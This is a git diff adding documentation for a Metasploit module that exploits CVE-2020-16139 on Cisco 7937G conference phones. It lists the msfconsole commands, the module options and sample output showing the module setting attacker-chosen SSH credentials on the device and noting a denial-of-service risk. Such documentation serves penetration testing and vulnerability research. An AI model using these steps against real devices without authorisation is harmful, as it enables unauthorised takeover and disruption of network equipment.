parent
8fe7417d1b
commit
1e244ddaec
|
@ -0,0 +1,44 @@
|
|||
## Vulnerable Application
|
||||
|
||||
1. Obtain a Cisco 7937G Conference Station.
|
||||
2. Enable Web Access and SSH Access on the device.
|
||||
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
||||
3. Do: `set RHOSTS 192.168.1.10`
|
||||
4. Do: `set USER test`
|
||||
5. Do: `set PASS test`
|
||||
6. Do: `run`
|
||||
7. The conference station's SSH service should now be configured with the supplied USER:PASS.
|
||||
|
||||
## Options
|
||||
|
||||
1. PASS (required) - Desired password
|
||||
2. RHOSTS (required) - Target addres
|
||||
3. THREADS (default 1, required) - The number of concurrent threads (max one per host)
|
||||
4. TIMEOUT (default 5, required) - Timeout in seconds before aborting
|
||||
5. USER (required) - Desired username
|
||||
|
||||
## Scenarios
|
||||
|
||||
#### Successful Scenario
|
||||
```
|
||||
[*] Running for 192.168.110.209...
|
||||
[*] 192.168.110.209 - Attempting to set SSH credentials.
|
||||
[*] 192.168.110.209 - SSH attack finished!
|
||||
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
|
||||
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
|
||||
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
|
||||
```
|
||||
|
||||
#### Unsuccessful Scenario
|
||||
```
|
||||
[*] Running for 192.168.110.209...
|
||||
[*] 192.168.110.209 - Attempting to set SSH credentials.
|
||||
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
Loading…
Reference in New Issue